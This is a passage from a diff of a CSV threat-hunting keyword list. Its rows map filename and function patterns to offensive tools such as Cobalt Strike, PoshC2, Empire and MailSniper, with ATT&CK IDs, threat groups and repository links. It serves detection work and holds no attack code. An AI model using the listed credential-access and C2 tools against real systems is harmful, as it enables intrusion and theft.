TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_rooot.c*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" -"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 